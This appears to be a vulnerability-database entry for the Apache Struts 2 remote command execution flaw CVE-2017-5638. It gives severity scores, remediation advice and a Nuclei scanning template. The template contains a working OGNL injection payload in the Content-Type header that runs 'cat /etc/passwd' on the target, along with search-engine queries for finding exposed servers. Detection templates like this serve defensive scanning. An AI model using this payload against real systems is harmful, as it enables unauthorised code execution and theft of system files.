Lucene search
ProjectDiscoveryNUCLEI:CVE-2017-5638HistoryAug 19, 2020 - 1:13 p.m.
Apache Struts 2 - Remote Command Execution
2020-08-1913:13:31
ProjectDiscovery
github.com
36
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.4 High
AI Score
Confidence
High
0.975 High
EPSS
Percentile
100.0%
Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.
id: CVE-2017-5638
info:
name: Apache Struts 2 - Remote Command Execution
author: Random_Robbie
severity: critical
description: |
Apache Struts 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is susceptible to remote command injection attacks. The Jakarta Multipart parser has incorrect exception handling and error-message generation during file upload attempts, which can allow an attacker to execute arbitrary commands via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header. This was exploited in March 2017 with a Content-Type header containing a #cmd= string.
impact: |
Remote attackers can execute arbitrary commands on the target system.
remediation: |
Upgrade to Apache Struts 2.3.32 or 2.5.10.1 or apply the necessary patches.
reference:
- https://github.com/mazen160/struts-pwn
- https://isc.sans.edu/diary/22169
- https://github.com/rapid7/metasploit-framework/issues/8064
- https://nvd.nist.gov/vuln/detail/CVE-2017-5638
- http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2017-5638
cwe-id: CWE-20
epss-score: 0.97542
epss-percentile: 0.99995
cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: struts
shodan-query:
- html:"Apache Struts"
- http.title:"struts2 showcase"
- http.html:"struts problem report"
- http.html:"apache struts"
fofa-query:
- body="struts problem report"
- title="struts2 showcase"
- body="apache struts"
google-query: intitle:"struts2 showcase"
tags: cve2017,cve,apache,kev,msf,struts,rce
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Content-Type: %{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#[email protected]@DEFAULT_MEMBER_ACCESS,#cmd="cat /etc/passwd",#cmds={"/bin/bash","-c",#cmd},#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start(),#b=#process.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#[email protected]@getResponse().getWriter(),#rw.println(#e),#rw.flush())}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100abf34bde000320ae4e9c1d41b55199b292cda0a25e76520dbbd0fb79fdc188c5022100b6cb3b2918088f18956ef2d5bef585397d1d187a42df64a8f428694357252bb6:922c64590222798bb761d5b6d8e72950Related
vmware
vmware
saint
saint
Apache Struts 2 Jakarta Multipart Parser file upload command execution
2017-03-16 00:00:00
Apache Struts 2 Jakarta Multipart Parser file upload command execution
2017-03-16 00:00:00
Apache Struts 2 Jakarta Multipart Parser file upload command execution
2017-03-16 00:00:00
atlassian
atlassian
Apache Struts 2 Remote Code Execution (CVE-2017-5638)
2017-03-10 04:57:51
Apache Struts 2 Remote Code Execution (CVE-2017-5638)
2017-03-10 04:31:09
Apache Struts 2 Remote Code Execution (CVE-2017-5638)
2017-03-10 04:31:09
rapid7community
rapid7community
Apache Struts Vulnerability (CVE-2017-5638) Exploit Traffic
2017-03-15 14:29:55
openvas
openvas
qualysblog
qualysblog
Cryptomining is all the rage among hackers, as DDoS amplification attacks continue
2018-03-09 21:45:09
How To Prioritize Vulnerabilities in a Modern IT Environment
2018-05-07 16:00:10
The Sky Is Falling! Responding Rationally to Headline Vulnerabilities
2018-04-19 23:00:03
kitploit
kitploit
strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)
2017-03-14 17:30:00
struts-pwn - An exploit for Apache Struts CVE-2017-5638
2017-03-14 13:34:00
trendmicroblog
trendmicroblog
Sound, Fury, And Nothing One Year After Equifax
2018-09-07 12:00:34
Linux is secure…right?
2017-06-15 19:00:13
threatpost
threatpost
Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies
2017-10-03 15:27:08
Apache Attack Traffic Dropping, Limited to Few Sources
2017-03-10 10:51:01
Equifax to Pay $700 Million in 2017 Data Breach Settlement
2019-07-22 14:31:39
attackerkb
attackerkb
CVE-2017-5638
2017-03-11 00:00:00
CVE-2019-0230
2020-09-14 00:00:00
redhatcve
redhatcve
CVE-2017-5638
2017-03-08 11:53:37
lenovo
lenovo
Apache Struts Open Source Framework Remote Code Execution - us
2017-06-09 00:00:00
checkpoint_advisories
checkpoint_advisories
Apache Struts2 Content-Type Remote Code Execution (CVE-2017-5638)
2017-03-07 00:00:00
Apache Struts 2 Content-Disposition Remote Code Execution (CVE-2017-5638)
2017-08-09 00:00:00
ubuntucve
ubuntucve
CVE-2017-5638
2017-03-11 00:00:00
impervablog
impervablog
Clustering App Attacks with Machine Learning Part 3: Algorithm Results
2018-06-19 22:41:03
osv
osv
Apache Struts vulnerable to remote arbitrary command execution due to improper input validation
2018-10-18 19:24:26
CVE-2017-5638
2017-03-11 02:59:00
prion
prion
Design/Logic Flaw
2017-03-11 02:59:00
myhack58
myhack58
How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net
2017-03-08 00:00:00
packetstorm
packetstorm
Apache Struts 2 2.3.x / 2.5.x Remote Code Execution
2017-03-10 00:00:00
Apache Struts Jakarta Multipart Parser OGNL Injection
2017-03-14 00:00:00
hackerone
hackerone
U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website
2017-03-09 17:59:08
U.S. Dept Of Defense: Remote Code Execution (RCE) in a DoD website
2017-03-13 13:22:29
U.S. Dept Of Defense: Remote code execution vulnerability on a DoD website
2017-03-13 04:14:12
canvas
canvas
Immunity Canvas: STRUTS_OGNL
2017-03-11 02:59:00
malwarebytes
malwarebytes
Equifax breach: What you need to know [updated]
2017-09-08 07:02:47
ibm
ibm
nessus
nessus
Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (remote)
2017-03-08 00:00:00
Apache Struts 2.3.5 - 2.3.31 / 2.5.x < 2.5.10.1 Jakarta Multipart Parser RCE (S2-045) (S2-046)
2017-03-07 00:00:00
Apache Struts 2 RCE (CVE-2017-5638) (deprecated)
2017-04-12 00:00:00
seebug
seebug
S2-046: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
2017-03-21 00:00:00
S2-045: Struts 2 Remote Code Execution vulnerability(CVE-2017-5638)
2017-03-06 00:00:00
thn
thn
New Apache Struts Zero-Day Vulnerability Being Exploited in the Wild
2017-03-09 01:03:00
UK Regulator Fines Equifax £500,000 Over 2017 Data Breach
2018-09-20 13:54:00
Whoops, Turns Out 2.5 Million More Americans Were Affected By Equifax Breach
2017-10-02 21:23:00
cisa_kev
cisa_kev
Apache Struts Remote Code Execution Vulnerability
2021-11-03 00:00:00
cisco
cisco
securelist
securelist
Unveiling NKAbuse: a new multiplatform threat abusing the NKN protocol
2023-12-14 13:00:40
krebs
krebs
Equifax Hackers Stole 200k Credit Card Accounts in One Fell Swoop
2017-09-14 18:03:12
f5
f5
K43451236 : Apache Struts 2 vulnerability CVE-2017-5638
2017-03-09 00:00:00
cve
cve
CVE-2017-5638
2017-03-11 02:59:00
cert
cert
Apache Struts 2 is vulnerable to remote code execution
2017-03-14 00:00:00
cloudfoundry
cloudfoundry
CVE-2017-5638: Apache Struts Remote Code Execution | Cloud Foundry
2017-03-14 00:00:00
zdt
zdt
Apache Struts Jakarta Multipart Parser OGNL Injection Exploit
2017-03-15 00:00:00
Apache Struts 2 2.3.x / 2.5.x Remote Code Execution Exploit
2017-03-12 00:00:00
huawei
huawei
github
github
Apache Struts vulnerable to remote arbitrary command execution due to improper input validation
2018-10-18 19:24:26
Bypassing OGNL sandboxes for fun and charities
2023-01-27 16:00:49
veracode
veracode
Remote Code Execution (RCE) Through Jakarta Multipart Parser
2017-03-09 12:39:55
cvelist
cvelist
CVE-2017-5638
2017-03-11 02:11:00
nvd
nvd
CVE-2017-5638
2017-03-11 02:59:00
pentestit
pentestit
UPDATE: Infection Monkey 1.6.1
2018-12-03 22:28:53
JexBoss: Java Deserialization Verification & EXploitation Tool!
2017-08-11 06:52:45
talosblog
talosblog
2017 in Snort Signatures.
2018-01-29 11:37:00
Another Apache Struts Vulnerability Under Active Exploitation
2017-09-07 15:42:00
nmap
nmap
http-vuln-cve2017-5638 NSE Script
2017-03-10 17:53:45
ics
ics
Top 10 Routinely Exploited Vulnerabilities
2020-05-12 12:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2017
2017-04-18 00:00:00
Oracle Critical Patch Update Advisory - July 2017
2018-03-20 00:00:00
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.4 High
AI Score
Confidence
High
0.975 High
EPSS
Percentile
100.0%
Related for NUCLEI:CVE-2017-5638